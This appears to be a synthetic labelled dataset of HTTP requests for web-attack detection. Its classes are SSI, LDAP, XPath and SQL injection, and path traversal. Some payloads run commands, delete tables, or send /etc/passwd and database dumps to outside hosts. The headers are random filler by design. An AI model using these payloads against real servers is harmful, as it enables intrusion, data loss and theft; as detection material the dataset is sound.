Authorization: tf1et Eejuotis=rwaduier
Range: 064373-124259,214-265,801-679
Referer: /iTctepSY/atcn.exe
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.4 (X11; U; SunOS sun4u 2.6; aw-5p; rv:2.0.6) Gecko/87519475
UA-CPU: PowerPC
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 629x1097
Via: FTP/3.8 242.139.29.49:46381, HTTP/1.2 www.pdad.shtml, 9.8 www.ltntihk.jpg
Transfer-Encoding: jefl3a
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 945 www.gtdUia.htm:89243 "orsieue5ctiw" 
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43854
Start - Id: 39955
class: SSI
GET /hSrn0c1EwI9/nq/eehtdhromkm/irorelso5anynlaee/wu/ei/fcW42position/ii1tltaorAe/7atU9eesstrn3toiim8/nn9hu/x_D1caj7XAtqHM/odEs9nsv8.dll?dropG3WformpRZ=01285&vIOe=htacces&THPuKK=8591695&noH=%3C%21++%23%3C%21--+++++%23exec+++cmd%3D%22id%22--%3E&Q@bI=8617&hlztterkheot=D%24 HTTP/1.1
Host: www.sE6rrh.net
Connection: close
Accept: image/*, audio/basic;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 225.57.174.238
Cookie: 1z9nUGllesBlnts=aZAaCsvR4SbK;uce2eelmei=window.openD;c8=ihlT'86wgetbd4 asswsry;sqqYlikeWL6t1i=a;sntafyY63rMhw=ttue
Cookie2: $Version="158"
Date: Thu, 08 Jan 09 17:21:50 UTC
ETag: W/"kT0uPx4hGu-xBjDxNmhh"
Expect: 100-continue
From: uaoalish@aer2rer6.org
If-Modified-Since: Thu, 06 Jul 06 14:58:05 GMT
If-Unmodified-Since: Sat, 23 Apr 05 10:12:27 CET
If-Match: *
If-None-Match: "uyknDWh9ryAZWTPdUR"
If-Range: Thu, 09 Mar 06 16:37:59 CET
Max-Forwards: 0618
Pragma: no-cache
Proxy-Authorization: Digest response="ac4BeDAbEcd7D693f5c14DA2968662dc"
Authorization: 7ilWt neoUeF=c3Eyhe
Referer: http://www.dnNp8doi.org/hapcic/tWbjot/s0arbrt.jsp
TE: trailers
Trailer: Connection
User-Agent: Mozilla/4.9 (X11; U; Solaris 4.8; ia-ns; rv:5.0.8) Gecko/98781534
UA-Color: color16
Via: FTP/8.0 www.yeawkaHs.shtml, 5.8 www.zIitmnNa.js
Transfer-Encoding: identity
Upgrade: BEt/7.6, h1sd/6.5, roeKws/7.5, meae/9.7, Tufb6/3.7
Warning: 920 2.33.97.58 "exoEohddhnP0c4dewku" "Sun, 06 Apr 08 17:14:18 CET"
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39955
Start - Id: 38421
class: LdapInjection
GET /i.1h/srtnpra4ns/eh6fsA5J/usttwgmoz/6ihe8szerbert7sn/JQ/lwMmPK6QYq3YoTpamD/etNhnihwo6ltnjuhcmeN.jpg?htgoiolrnbs=AaweTrgr8&dIoptrld5=gj%29%28++%7C++%28lchE%3D*%29&mHeo0idmsOn=842&nogEhricrhtcewo=%25&8nSUQp3access_logMH=3715835126&2emtip5tsea=unionolj HTTP/1.0
Host: www.t0floIsa.uk:0691
Connection: erclorI
Accept: image/png;q=0.4, application/rtf;q=0.4, image/*;q=0.4
Accept-Charset: windows-1258;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 169.13.143.24
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="88"
Date: Mon, 18 Dec 06 03:30:07 UTC
ETag: "lgJ7scf03Ot927CuMS"
Expect: w7lal
From: r8urdpH@atna.uk
If-Modified-Since: Thu, 09 Dec 04 20:16:55 GMT
If-Unmodified-Since: Thu, 17 Jun 04 10:28:18 UTC
If-Match: "uHDclq5lEGLx96YOP"
If-None-Match: *
If-Range: Sun, 14 Sep 08 11:03:48 GMT
Max-Forwards: 7087
MIME-Version: 0.1
Pragma: l=Eee
Proxy-Authorization: Digest cnonce="twseli3"
Authorization: 5haicz v8e4hrd=leeaos
Range: -96373
Referer: /wthdtadS/bohsir/31nqeI/saibe.jsp
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: eg9vag/9.0.7
UA-CPU: MIPS
UA-Disp: 461,871,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: 2.6 1.116.253.158, HTTP/3.8 www.epxaNoh.html:625
Transfer-Encoding: deflate
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38421
Start - Id: 35997
class: PathTransversal
POST /O1ir6Y5goUrAsVlink.html? HTTP/1.1
Content-Length: 142
Content-Language: Ndsoer,nd
Content-Encoding: gzip
Content-Location: http://www.ie3ts.de/aEtar/hiavq/s8sy.dll
Content-MD5: MU1ucXVyZWxpZDVvZXFldA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Dec 05 20:24:51 CET
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 155.124.252.210
Connection: Utatjlt
Accept: */*;q=0.6
Accept-Charset: x-mac-cyrillic, us-ascii, x-mac-japanese;q=0.6, iso-2022-jp;q=0.0, big5
Accept-Encoding: *;q=0.0
Accept-Language: aerrgseo-f7h;q=0.3, 4-eaqd;q=0.7, 3biol-tcb;q=0.1, Bbto-hat;q=0.3, 1s-ced
Cache-Control: no-store
Client-ip: 27.34.193.196
Cookie: GcatVf-rT2FX=ietinm;Lbhona=313520925;is=9935674;3phoohko=7logl= 
Cookie2: $Version="232"
Date: Sat, 11 Feb 06 08:22:32 GMT
ETag: W/"BlYWiXEeTeQyj4LLGp5t"
Expect: 100-continue
From: rA7tR@tqia61e.ch
If-Modified-Since: Thu, 10 Aug 06 10:39:54 UTC
If-Unmodified-Since: Mon, 19 Jun 06 20:40:34 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 07 Mar 10 01:51:44 CET
Max-Forwards: 4
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Authorization: Basic dHR0NGNvdTptZG9EZHl1
Range: 34063-7921,92-84013,52-
Referer: http://www.ess7ht.org/irds/hthhpto/yigH/htestt.gz
TE: chunked,trailers,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/6.9 (Machintosh; U; PPC Mac OS X 7.9; ae-it; rv:5.9.6) Gecko/19495080
UA-OS: Win98
UA-Pixels: 551x993
Via: HTTP/9.1 www.lky8sso.jpg
Transfer-Encoding: compress
Upgrade: uUi/7.8, eeds/2.6, Myede/4.4
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 133.228.168.254
~~~~~: ~~~~~~~~~~~~~~~~~~~~

gErzo=:lacowhereaesamec:e&nWrdorsuir=access_logc&poeeuhGTpx9Dn=../../../../../../../../../usr/yo.bat&ldktnesra=no4u=

End - Id: 35997
Start - Id: 41913
class: SqlInjection
GET /mh3/55ekts/thnezwglz4al/edapExA0eEUEz0Ab.@N3.htm?sx_betweenv2=%27+++%29%3B+++++delete+from++++users%3B+commit%3B+++dummy%28+%27 HTTP/1.1
Host: 70.227.214.226
Connection: close
Accept: video/quicktime, video/mpeg;q=0.3
Accept-Charset: hz-gb-2312;q=0.5, iso-8859-8, iso-8859-8;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.3
Cache-Control: max-stale=297
Client-ip: 49.104.245.149
Cookie: dmetab= hon;3Hepnel=asht67aa;heo1ginlhDerl=linkiaDCInode|c'h
Cookie2: $Version="8"
Date: Tue, 07 Feb 06 03:26:34 GMT
ETag: "MLO5o.MWGTcwAKH2E"
Expect: 100-continue
From: whodpi@rrheriuA.net
If-Modified-Since: Mon, 11 Apr 05 13:58:59 UTC
If-Unmodified-Since: Tue, 28 Feb 06 08:58:43 GMT
If-Match: "O7R1Uee@w6NwM6nWE"
If-None-Match: "qJx-.B@oBWFIhNkfhOq"
If-Range: *
Max-Forwards: 9
MIME-Version: 5.8
Pragma: i='nsss'
Proxy-Authorization: Basic Z250RmVlOmVlaG9scnll
Authorization: emee end4=r8nm
Range: 301875-45,510153-7
Referer: /uhnjpan5.exe
TE: gzip
Trailer: Via
User-Agent: Mozilla/5.6 (compatible; Konqueror/9.4; Win98; ys7od)
UA-CPU: PowerPC
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/7.2 www.Rsnie.shtml
Transfer-Encoding: 0dFe; fwLlo=trea3eht
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 693 www.eetix.jpg "disicab5cesf" "Tue, 14 Aug 07 21:20:16 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41913
Start - Id: 48674
class: XPathInjection
POST /Hhlcn2tedtrb9elNsenh/sdebhsoElb/eHlDMJCBY38/l5pDm5i/hCEmO30s/nhlob9fseeatmugrks/mkrrm9tBKjuZPv/t0aemE1F/p8gaienrde/JemiMi4femtcm/gWnBgW_-2w.L/p3KbRZB@cY3Cq1-F8A79.php4? HTTP/1.0
Content-Length: 322
Content-Language: 0o,tete
Content-Encoding: deflate
Content-Location: /azex/dw6cf2/u8tE/nrrwnznt.pdf
Content-MD5: eXlubGlpcXN5Nm9hbmlmYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Jul 09 17:53:57 GMT
Last-Modified: Thu, 15 Jun 06 23:18:11 UTC
Host: 51.163.6.166
Connection: close
Accept: audio/*, application/x-tar;q=0.8, application/postscript;q=0.7
Accept-Charset: windows-1250;q=0.3, iso-8859-7;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=42212
Client-ip: 94.68.181.174
Cookie: 9ut1=188114;epbainfieu0qrr=g8$i;hru6stic=h.gL5Lx20R;oee=+8exec
Cookie2: $Version="33"
Date: Fri, 08 Feb 08 06:29:21 UTC
ETag: "3.OeJwn1snCY3-uU"
Expect: fdei
From: e32rlse@ib5bceaa.org
If-Modified-Since: Sun, 26 Dec 04 08:16:46 GMT
If-Unmodified-Since: Thu, 01 Nov 07 09:42:44 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Feb 07 16:51:34 CET
Max-Forwards: 3
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic dHNlbTppbWhz
Authorization: 4snho cM2brwm1=rdelen
Range: 12-
Referer: http://www.predm.be/llo8e/sewene/sitTs.png
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: rq9UYQ0KD http://www.iiffua.de
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: 2.2 www.adAnfHn.png
Transfer-Encoding: compress
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 32.231.214.148
X-Serial-Number: 9550547356245150782
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

La7DKlqT=625&4euhiR=3 &5tsjuqyrarEtad=enttoccgegOsY&tAmiutyuRyaoiu=ieoe&Uluttsirleila=0721&enaDLo8rwlltac=(i     <  count(of/child::text())  and j    < count(i0io/child::comment())     and k     <    count(enO/child::*)     )&iedgeezt=netegE&aed= dm|tmpnodetupassthruodaTo

End - Id: 48674
Start - Id: 40169
class: SSI
GET /girwhereFh/aOTUhtaccesF5jFmocha5/39KApXrR/6hGSzsqWtH5m.R/PncBE41@-BJr.msf?y6alcqssow=%3DtT8ahe%7Cwnxel&9srsl=%3C%21+%23%3C%21--%23exec+++++cmd%3D%22id%22--%3E&5Swe=rmJMf&afir7uza=6145&njwinntz8Pn=thchnemhrecTzsoS&nto1p4cEpc=am1aoFo&ieio=lBMucijZ-FY2 HTTP/1.0
Host: 231.23.3.65:80
Connection: keep-alive
Accept: audio/basic
Accept-Charset: hz-gb-2312, us-ascii, euc-cn, euc-cn;q=0.1, us-ascii
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 165.96.86.136
Cookie: VIItzQJqgroup byphplT=s.K.R;max=ft;lku1=m+ae;n5it4cgimtb=569
Cookie2: $Version="360"
Date: Sat, 28 Jan 06 20:51:15 UTC
ETag: W/"k_aCPWy5XqeILlOdj5S"
Expect: 100-continue
From: stce@ygsk.st
If-Modified-Since: Mon, 21 Aug 06 19:18:03 UTC
If-Unmodified-Since: Sun, 26 Aug 07 08:12:42 GMT
If-Match: *
If-None-Match: "PkjiZ_JK4GmOjIG"
If-Range: Sat, 13 Sep 08 08:30:38 UTC
Max-Forwards: 1975
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic cGNuY3Njczplbm9ybTQ=
Authorization: tsnral ysei=dtieashn
Range: 728-,7-688430
Referer: /traet8e/C5hq/9tl5sqi/ecfhRSrd/xops.php3
TE: trailers
Trailer: Warning
User-Agent: Mozilla/9.5 (X11; U; Solaris 7.6; Hr-ty; rv:9.9.4) Gecko/93972243
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 427x7361
Via: 0.0 20.23.193.181
Transfer-Encoding: a4ge; thpeg=5untis6n
Upgrade: qqwOfh/2.2, nit/0.5, rgtS1w/1.5, 7oAia/1.6
Warning: 170 76.199.57.65 "sisbajy1tp1snjc" "Wed, 26 Aug 09 22:46:27 CET"
X-Forwarded-For: 237.110.243.93
X-Serial-Number: 06191135820
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40169
Start - Id: 46191
class: PathTransversal
GET /mrK2E.79PFYtxV8zhG.X/eaotbeL9/p8seeii/nb/abuy6e.tiff?@mKiEilike-kqZW=%2FhlnW&eiE8=sSUC&Esex=55681855&exopjpjoe=%2Fetc%2Fhttpd%2Fhttpd.conf&a7taaeaneIa8=fsav&dNulnntr7o=mosHImtad4An2hhn&ir7h7fnc7a=ta0dedLEd4lxmlst&aLDO=6180995947&wdrtonundeesnie=89180308&shaieso9=%26+ HTTP/1.0
Host: 148.203.121.246
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, deflate;q=0.6
Accept-Language: *;q=0.0
Cache-Control: min-fresh=91
Client-ip: 68.94.47.234
Cookie: 3xmldC3uDyQUi2=0132598;Qa1stdinJXgboot.iniH=48662
Cookie2: $Version="17"
Date: Sat, 25 Sep 04 08:27:52 UTC
ETag: W/"MLizzqbNdRPN0jiUSt"
Expect: 100-continue
From: sloo@sd406oko.ch
If-Modified-Since: Tue, 10 Oct 06 21:07:59 CET
If-Unmodified-Since: Fri, 03 Apr 09 16:48:18 CET
If-Match: *
If-None-Match: "GAPv-uCDko4zwh65"
If-Range: "-Rj9Lq3GxzlX@C-3r-"
Max-Forwards: 00
MIME-Version: 2.5
Pragma: 3e=xsS
Proxy-Authorization: Basic Z2Q2bmVlOmFsaWd0aA==
Authorization: g4eet lfeuzoi7=eeeeogin
Range: -9581,5-242
Referer: http://www.usatpk.com/5eott/rUNret/vgdarl1/14iccgt.tiff
TE: trailers,chunked;q=0.4
Trailer: Accept-Language
User-Agent: Mozilla/1.1 (compatible; MSIE 7.5; Win98; hGaorbrn; 6teilruer)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: HTTP/3.9 253.157.170.106, 3.8 www.np1tf4u9.htm:6310
Transfer-Encoding: compress
Upgrade: amiap/9.1
Warning: 885 150.132.83.196:7 "UN6M8draouta3nienwag" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 308717764624238
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46191
Start - Id: 37069
class: LdapInjection
GET /szB/@kJ63/npdotooeT/tHurFqf9141z4MVkt/fcopyIA/0FjHOZLQfLBayV/icyxc1p_2nl2koOVME/JandNimgq_SRd/na9/frioora5WaiuaO/6varBgoawindow.openZt./adbnLqFSadgehZ1fneth.html?euiLie2Legmd=%29++%28+++%7C++%28+cn%3D*o++++%27brien*++%29%28mail++++%3D*o++%27brien*+%29++++&At=hnrehSws6q&VCoE=iupdateoq+s5+z4xn%3Etis&vrree0sd=27682821 HTTP/1.0
Host: 231.255.107.205:0
Connection: close
Accept: video/quicktime;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: a1yt-relege
Cache-Control: sEnHP9iU='tgsh'
Client-ip: 206.144.26.20
Cookie: leesi4i3=3
Cookie2: $Version="7"
Date: Thu, 04 Oct 07 04:56:47 CET
ETag: W/"Kzo6hXv1PcdAEDWXUlNO"
Expect: semcn
From: umuI@4eritQe.de
If-Modified-Since: Wed, 12 Aug 09 08:55:48 CET
If-Unmodified-Since: Wed, 16 Mar 05 17:12:10 CET
If-Match: "mYGHHnXRVUvA-2a"
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Fri, 06 Aug 04 05:24:49 GMT
Max-Forwards: 18
MIME-Version: 4.7
Pragma: mnseght=qrs0
Proxy-Authorization: NTLM Z3R4bTBncnJObmllYWVldGVhNDRDbzNzc290M2F5ZVJhOGhhcmVlZXRkdmM=
Authorization: NTLM WTZxb2V6c2ltMHNlaU9hdFQ3TXJzbnR0MGx6QWZnbGZ1a21FdA==
Range: -61152
Referer: http://eI5n.net/eeivt3Ho/Tv7t/wooai/ttmdik.nsf
TE: chunked;q=0.2,deflate,gzip;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/0.1 (Windows; U; Win98 4.1; yr-dh; rv:9.8.0) Gecko/27094291
UA-CPU: PowerPC
UA-Disp: 538,106,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
Via: uaocm/0.7 www.3aece.jpeg, 2.2 194.247.72.38
Transfer-Encoding: compress
Upgrade: ioioo1/4.1, ettwpy/6.9, nre0l/0.3, 4aueu/0.2, zaesr/2.7
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 75.212.179.183
X-Serial-Number: 733012895588
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37069
Start - Id: 37437
class: LdapInjection
GET /beo9oiEhtslu/elsftlrlgprnSez/d82eusltelh.asp? HTTP/1.1
Host: www.zaghmnmhvc.gov
Connection: close
Accept: video/*, video/*;q=0.8, audio/basic;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: rrm6aHps-trItrtu, iodsjs3-snp3aa
Cache-Control: no-cache
Client-ip: 84.5.229.156
Cookie: eiN9K=tLTQU4zZ;aaam=0qsAacanhmnaiOt;cxawzIThdt=)   ( |    (   cn=*o'brien*)(mail =*o  'brien*   ) 
Cookie2: $Version="8"
Date: Tue, 07 Apr 09 20:05:16 GMT
ETag: "tAcpyk7tvvbb5XYUcZ"
Expect: 100-continue
From: arSeni@esqqy2etgc.cz
If-Modified-Since: Wed, 14 Jul 04 12:15:13 GMT
If-Unmodified-Since: Thu, 16 Jun 05 04:21:40 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 27 Mar 07 24:21:30 CET
Max-Forwards: 4385
MIME-Version: 0.7
Pragma: noUt='eltyiren'
Proxy-Authorization: nlct tngmes=oZoE0u
Authorization: Digest nonce
Range: 1-644,5-,4025-
Referer: /ztukzaa/iiodtoOo/yfNsaRt/tnhd.tar.gz
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/5.1 (Windows; U; Windows NT 0.1; tl-br; rv:3.2.2) Gecko/38766381
UA-CPU: Sparc
UA-Disp: 160,5878,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7873x595
Via: 9.0 136.162.52.31
Transfer-Encoding: gzip
Upgrade: srec/2.4, wspc/1.9
Warning: 379 223.54.79.69 "izotholigaL" 
X-Forwarded-For: 218.58.31.100
X-Serial-Number: 973264
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37437
Start - Id: 39929
class: SSI
POST /dNshgaeri/allpasswdQrgahttp@6Y3oOJ/ityKLCKAbA0/u1nUSUZl6jb-B9QA_ZZc/msrTntijh/odenmp2te5peehecRl/gnM4cp.XpNRby9lgh_LR/50rB5U.ZKCFO.dll? HTTP/1.1
Content-Length: 111
Content-Language: vgi,hin,ge
Content-Encoding: identity
Content-Location: http://www.iisorta.com/u9aTv/zompe/ssTtkoa.html
Content-MD5: bGF3Y3RzdGVlZXc1c21paQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Dec 04 24:22:32 CET
Last-Modified: Fri, 04 May 07 11:04:42 UTC
Host: 111.27.167.4
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 101.181.0.245
Cookie: .H_0Kwindow.openIT=251;hM2ireeebe=t+v/nsT(bdivlehnS6;ahnwceoEpctoiy=oxVrX;documentqkrE_3HAU=te ymhavingdr
Cookie2: $Version="0"
Date: Mon, 11 Jan 10 01:01:40 UTC
ETag: W/"3ax_BKlx3_dpxaTqEp"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Wed, 08 Jun 05 10:48:34 UTC
If-Unmodified-Since: Mon, 08 Mar 04 18:24:56 GMT
If-Match: "pO2y0ql29-QTi8C9"
If-None-Match: *
If-Range: "MIApyNYKDy81AJ4Ryyd7"
Max-Forwards: 4
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: vse5 LnTu5icu=otlnt
Authorization: Digest username="eseT3sEl"
Range: 065804-4,-22740,4181-
Referer: /w0ie/es7N9N8n/h6oca/e3ioe.asp
TE: chunked
Trailer: Warning
User-Agent: tMtr (tNKFvn@Or; gpM2PC_D7I; cZU1vSuEj)
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 625x1975
Via: 3.8 www.hsNlTas.png, 5.6 11.43.48.63:41, aoAdz/3.0 www.atji.jpeg:6939
Transfer-Encoding: compress
Upgrade: rZos/0.7, seee/7.7, tpcri/7.2, yeGh/9.2, etshoj/4.1
Warning: 800 145.154.254.159 "waio" "Sat, 03 Feb 07 02:53:35 CET"
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aenNioaik=eb4&pzbx3=<!--   #exec     cmd="/bin/mail    ajhseenelt.com < /etc/passwd"-->

End - Id: 39929
Start - Id: 38118
class: LdapInjection
GET /ua/4V9maphrk-y.dP.msf?dbrBae5c4aLede=unopentAh06e&dnhtunqpe=mqoy9wLson&ieet2toafXoeoi=lI.&nntttoI=3nimg+RH+scriptnSrie+nshutdownpk6&igwwre=tdn&fdooet=M%25+&sr=wee2&aihhbEasl=8&KRIy1siDr=3322184&aealscnnTr=%29%28++++%7C++++%28es%3Doaraa*%29&0y9lu=eu%40eD1H5&aE3irjsrzvox=0Uu&faoedtm=%26e0a&nl4=Ldetc HTTP/1.1
Host: www.hoIEgo4ai.ch
Connection: keep-alive
Accept: text/*;q=0.9, text/*;q=0.1, application/x-tar;q=0.8
Accept-Charset: windows-874;q=0.1, us-ascii, x-mac-arabic, windows-874;q=0.4
Accept-Encoding: 
Accept-Language: Eilhd2ai-dCstne, xKit-sd;q=0.0, btrn-iwdss;q=0.2
Cache-Control: max-stale=04513
Client-ip: 78.109.79.136
Cookie: htran9esDdfysg5=etin smtbetween;9Or6=yhejeae;eaetttt=&r]hftL;XPnodehwSwinntcJ=e1etmnAeblemocmuru
Cookie2: $Version="4"
Date: Tue, 01 Mar 05 10:18:32 UTC
ETag: "JkoRqWUTwzQqckjWOFJx"
Expect: 100-continue
From: ithsetus@ennnrj.net
If-Modified-Since: Tue, 13 May 08 24:31:28 CET
If-Unmodified-Since: Tue, 12 Sep 06 15:39:28 UTC
If-Match: "Y5KfYhUBUPdlLQ3w"
If-None-Match: *
If-Range: Tue, 21 Oct 08 13:10:14 GMT
Max-Forwards: 346
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="r4lciIea"
Authorization: mtik vc3Eion=aDdae
Range: 448259-
Referer: http://www.ziml.cz/d36b/yhtt9o/caHnd/bptyood8/dmynk.exe
TE: chunked,chunked;q=0.8,trailers
Trailer: Trailer
User-Agent: Mozilla/6.4 (X11; U; Unix 5.4; nL-4m; rv:8.0.4) Gecko/32437175
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3700x2595
Via: 5.2 178.12.145.116, eeaMo/0.8 65.87.250.41, 2.4 www.ah8N0k.gif
Transfer-Encoding: gzip
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 587 179.247.41.91:5 "gatfalPphg" "Thu, 07 Apr 05 01:06:21 UTC"
X-Forwarded-For: 194.35.95.99
X-Serial-Number: 2885123328233620
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38118
Start - Id: 41143
class: SqlInjection
GET /sidwndi/ytwrm/54n1dtW/t1ielihwgie.gif?kyn3rq6nuecr4Wn=exec++++xp_cmdshell++++%27bcp+++%22select++++*+++++from+++++thwkse9h4%22+++++queryout+++pwdump.exe++-c+++-Craw+++-Shackersip+-Usa+-Ph8ck3r%27&rnT=c+Rhp&4xlJVeao=bFsdxe HTTP/1.1
Host: www.itsetEwc.be:80
Connection: keep-alive
Accept: application/postscript
Accept-Charset: iso-8859-2, cp-932, hz-gb-2312;q=0.8, windows-1257;q=0.2, koi8;q=0.8
Accept-Encoding: 
Accept-Language: trLkEo-tmats, slhte-esjex, brGogt-7ae;q=0.7, u4aWa-tarns
Cache-Control: no-transform
Client-ip: 186.39.67.114
Cookie: oelyb4nfnnuw=av-XxZFQC
Cookie2: $Version="645"
Date: Thu, 10 Jan 08 10:33:05 CET
ETag: "3gWmZjep6Aga7L5S"
Expect: 100-continue
From: txaWstrh@gamw.fr
If-Modified-Since: Sat, 16 May 09 09:48:14 UTC
If-Unmodified-Since: Tue, 14 Jul 09 14:23:54 UTC
If-Match: "@OvZOKpmLqwcNPhkkJu"
If-None-Match: "nUC7cg0DaWfxulHtq0f"
If-Range: *
Max-Forwards: 8065
MIME-Version: 7.8
Pragma: drcar='5lizntie'
Proxy-Authorization: Basic dDlsN2UzOnJnZWUyZQ==
Authorization: NTLM ZDk3M3Rlcmg3a21wdXRuaWVobWlkb29VbG9nZWF5bUU=
Range: 70-3
Referer: /ESrghSXr.cfm
TE: gzip;q=0.4
Trailer: Date
User-Agent: aoinxle (sEo5jk2; aweunC4q; ikfVaFGn)
UA-CPU: Sparc
UA-Disp: 952,1268,32
UA-OS: FreeBSD
UA-Color: color32
Via: HTTP/2.2 www.ZusTdn.shtml:377, HTTP/1.4 www.ypaa.css:2, 0.6 119.148.86.49
Transfer-Encoding: gzip
Upgrade: ng6s/4.8, 4et/8.2
Warning: 458 www.anke2uT.gif "btsiteht9hIieeLwah" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 566074493
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41143
Start - Id: 42065
class: SqlInjection
GET /g8/sp@McxGbTlzUZOb.dll?hIa6=%3Cnu%400&WfromBstdinI=0095197&syrmqe=2IcW9W&ntvavdihalasNrt=OR++++%273hpl3%27+++++LIKE+++++%27Sim%25%27&kpKGne=6071&e4lsIen=i8so0libte%262&aao=aEJ-58&syti5=995 HTTP/1.1
Host: www.ef1ee.it:80
Connection: ahbe
Accept: */*;q=0.0
Accept-Charset: x-mac-roman
Accept-Encoding: 
Accept-Language: toq5Lies-pnwol, of-ia9msne, d-EekiRpuw, rizubn-d;q=0.1
Cache-Control: max-stale
Client-ip: 147.90.51.52
Cookie: lrt0NSarsahreO=o0ddD)eAi3e;6eaLbdetti3=7322632;gl=000033411
Cookie2: $Version="58"
Date: Sat, 13 Sep 08 19:15:51 UTC
ETag: W/"Z8zmZnMnwtBnFN6xu2"
Expect: dntttuy
From: rnlon@elnNaanan.fr
If-Modified-Since: Mon, 09 Aug 04 07:23:49 UTC
If-Unmodified-Since: Fri, 24 Aug 07 09:22:48 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 18 May 09 18:10:29 UTC
Max-Forwards: 32
MIME-Version: 0.9
Pragma: b='obv'
Proxy-Authorization: miIioo U7Eesss=eomtuaa
Authorization: traqii ecobe=djE3usta
Range: 97-55
Referer: /unoevq/Levp/citea9/mdat.zip
